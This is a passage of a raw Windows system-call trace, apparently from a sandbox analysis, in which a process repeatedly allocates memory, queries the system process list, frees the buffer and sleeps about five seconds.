FreeType=0x8000) returned 0x0 [0215.872] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.893] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.899] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.907] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.916] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.923] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.931] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.937] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.944] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.951] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.957] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.965] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.972] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.979] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.986] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.004] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.325] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.341] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.350] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.358] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.367] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 